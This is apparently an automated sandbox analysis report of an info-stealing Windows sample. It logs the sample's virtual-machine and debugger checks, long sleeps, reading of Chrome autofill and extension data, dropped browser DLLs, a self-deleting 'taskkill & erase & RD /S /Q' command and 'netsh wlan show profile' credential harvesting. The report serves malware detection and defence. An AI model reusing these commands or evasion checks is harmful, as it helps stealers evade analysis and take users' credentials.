Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: chormuim.exe, 00000008.00000000.371044114.00000000029DD000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356697477.00000000029F7000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe TID: 6256 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe TID: 6020 Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 6_2_004019F0
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Thread delayed: delay time: 922337203685477
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Dropped PE file which has not been started: C:\ProgramData\mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AnonFileApi.dll
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Dropped PE file which has not been started: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DotNetZip.dll
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Dropped PE file which has not been started: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Is looking for software installed on the system
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: Amcache.hve.29.dr Binary or memory string: VMware
Source: Amcache.hve.29.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.29.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.29.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.29.dr Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: chormuim.exe, 00000008.00000000.372742094.000000001B711000.00000004.00000001.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMwareO63ZKH6EWin32_VideoControllerZG8C8BN8VideoController120060621000000.000000-00089490234display.infMSBDAWG6VM9MFPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78Oin32p
Source: svchoste.exe, 00000004.00000002.329735600.00000000012BA000.00000004.00000020.sdmp, svchoste.exe, 00000004.00000002.329775240.0000000001312000.00000004.00000020.sdmp, WerFault.exe, 0000001D.00000002.397993752.0000026D6FEF9000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.29.dr Binary or memory string: VMware, Inc.me
Source: svchoste.exe, 00000004.00000002.329775240.0000000001312000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW,
Source: chormuim.exe, 00000008.00000002.407334729.0000000002AD1000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356819748.0000000002AD3000.00000004.00000001.sdmp, Info.txt.8.dr Binary or memory string: VirtualMachine: False
Source: chormuim.exe, 00000008.00000000.370201907.0000000002691000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.371044114.00000000029DD000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356697477.00000000029F7000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp Binary or memory string: VirtualMachine:
Source: chormuim.exe, 00000008.00000000.359002218.000000001B711000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000003.350741840.000000001B717000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.408878521.000000001B711000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.372742094.000000001B711000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^:
Source: chormuim.exe, 00000008.00000000.356697477.00000000029F7000.00000004.00000001.sdmp Binary or memory string: VMware`
Source: dll.exe, 00000005.00000002.303723799.00000000005A1000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.29.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.29.dr Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: chormuim.exe, 00000008.00000002.405581531.000000000081A000.00000004.00000020.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMwareO63ZKH6EWin32_VideoControllerZG8C8BN8VideoController120060621000000.000000-00089490234display.infMSBDAWG6VM9MFPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsZYHDS8ZN1:
Source: chormuim.exe, 00000008.00000000.370261870.00000000026F3000.00000004.00000001.sdmp Binary or memory string: vmware
Source: WerFault.exe, 0000001D.00000003.396906821.0000026D6E03A000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000002.397615188.0000026D6E03A000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWP
Source: chormuim.exe, 00000008.00000003.350741840.000000001B717000.00000004.00000001.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMwareO63ZKH6EWin32_VideoControllerZG8C8BN8VideoController120060621000000.000000-00089490234display.infMSBDAWG6VM9MFPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsZY
Source: chormuim.exe, 00000008.00000002.409089267.000000001B7AC000.00000004.00000001.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMwareO63ZKH6EWin32_VideoControllerZG8C8BN8VideoController120060621000000.000000-00089490234display.infMSBDAWG6VM9MFPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsZYHDS8ZNLMEMp
Source: chormuim.exe, 00000008.00000002.409089267.000000001B7AC000.00000004.00000001.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMwareO63ZKH6EWin32_VideoControllerZG8C8BN8VideoController120060621000000.000000-00089490234display.infMSBDAWG6VM9MFPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsZYHDS8ZN`8X
Source: Amcache.hve.29.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.29.dr Binary or memory string: VMware7,1
Source: Amcache.hve.29.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.29.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.29.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: chormuim.exe, 00000008.00000000.372980265.000000001B900000.00000004.00000010.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMwareO63ZKH6EWin32_VideoControllerZG8C8BN8VideoController120060621000000.000000-00089490234display.infMSBDAWG6VM9MFPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsZYHDS8ZNus
Source: Amcache.hve.29.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.29.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.29.dr Binary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
Source: Amcache.hve.29.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: chormuim.exe, 00000008.00000000.362756816.000000001B900000.00000004.00000010.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMwareO63ZKH6EWin32_VideoControllerZG8C8BN8VideoController120060621000000.000000-00089490234display.infMSBDAWG6VM9MFPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsZYHDS8ZNC:\WT:
Source: C:\Users\user\AppData\Local\Temp\dll.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B8B4E0 GetSystemInfo, 4_2_00B8B4E0
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B743DF FindFirstFileExA,GetLastError,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,_strcpy_s,__invoke_watson, 4_2_00B743DF
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B90540 wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose, 4_2_00B90540
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B8E640 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 4_2_00B8E640
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B8D360 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 4_2_00B8D360
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B8F6B0 FindFirstFileExW, 4_2_00B8F6B0
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File Volume queried: C:\ FullSizeInformation

Anti Debugging:

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 6_2_004019F0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B8C810 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 4_2_00B8C810
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B896D0 mov eax, dword ptr fs:[00000030h] 4_2_00B896D0
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B8B750 mov eax, dword ptr fs:[00000030h] 4_2_00B8B750
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process queried: DebugPort
Launches processes in debugging mode, may be used to hinder debugging
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6504 -s 1360
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B772E6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00B772E6
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B8B160 GetCurrentHwProfileA,GetProcessHeap,HeapAlloc,lstrcat, 4_2_00B8B160
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\dll.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B772E6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00B772E6
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B74354 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_00B74354
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B7E5C7 SetUnhandledExceptionFilter, 4_2_00B7E5C7
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_0040CE09
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_0040E61C
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00416F6A
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_004123F1 SetUnhandledExceptionFilter, 6_2_004123F1

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Process created: C:\Users\user\AppData\Local\Temp\svchoste.exe "C:\Users\user\AppData\Local\Temp\svchoste.exe"
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Process created: C:\Users\user\AppData\Local\Temp\dll.exe "C:\Users\user\AppData\Local\Temp\dll.exe"
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Process created: C:\Users\user\AppData\Local\Temp\chormuimii.exe "C:\Users\user\AppData\Local\Temp\chormuimii.exe"
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /pid 4648 & erase C:\Users\user\AppData\Local\Temp\svchoste.exe & RD /S /Q C:\\ProgramData\\216363876181815\\* & exit
Source: C:\Users\user\AppData\Local\Temp\dll.exe Process created: C:\ProgramData\AMD Driver\taskshell.exe "C:\ProgramData\AMD Driver\taskshell.exe"
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Process created: C:\Users\user\AppData\Local\Temp\chormuim.exe "C:\Users\user\AppData\Local\Temp\chormuim.exe"
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6504 -s 1360
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 4648
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr All
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Uses taskkill to terminate processes
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 4648
Source: taskshell.exe, 00000007.00000002.562750581.0000000001370000.00000002.00020000.sdmp, chormuim.exe, 00000008.00000000.354943209.0000000000F10000.00000002.00020000.sdmp, chormuim.exe, 00000008.00000000.369857165.0000000000F10000.00000002.00020000.sdmp, taskshell.exe, 0000000C.00000002.562969442.0000000001BD0000.00000002.00020000.sdmp, taskshell.exe, 00000010.00000002.562402848.0000000001010000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: taskshell.exe, 00000007.00000002.562750581.0000000001370000.00000002.00020000.sdmp, chormuim.exe, 00000008.00000000.354943209.0000000000F10000.00000002.00020000.sdmp, chormuim.exe, 00000008.00000000.369857165.0000000000F10000.00000002.00020000.sdmp, taskshell.exe, 0000000C.00000002.562969442.0000000001BD0000.00000002.00020000.sdmp, taskshell.exe, 00000010.00000002.562402848.0000000001010000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: taskshell.exe, 00000007.00000002.562750581.0000000001370000.00000002.00020000.sdmp, chormuim.exe, 00000008.00000000.354943209.0000000000F10000.00000002.00020000.sdmp, chormuim.exe, 00000008.00000000.369857165.0000000000F10000.00000002.00020000.sdmp, taskshell.exe, 0000000C.00000002.562969442.0000000001BD0000.00000002.00020000.sdmp, taskshell.exe, 00000010.00000002.562402848.0000000001010000.00000002.00020000.sdmp Binary or memory string: Progman
Source: taskshell.exe, 00000007.00000002.562750581.0000000001370000.00000002.00020000.sdmp, chormuim.exe, 00000008.00000000.354943209.0000000000F10000.00000002.00020000.sdmp, chormuim.exe, 00000008.00000000.369857165.0000000000F10000.00000002.00020000.sdmp, taskshell.exe, 0000000C.00000002.562969442.0000000001BD0000.00000002.00020000.sdmp, taskshell.exe, 00000010.00000002.562402848.0000000001010000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: GetProcessHeap,HeapAlloc,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,_memset,LocalFree, 4_2_00B8AA60
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: GetLocaleInfoA, 6_2_00417A20
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Queries volume information: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Queries volume information: C:\ProgramData\216363876181815\autofill\Google Chrome_Default.txt VolumeInformation
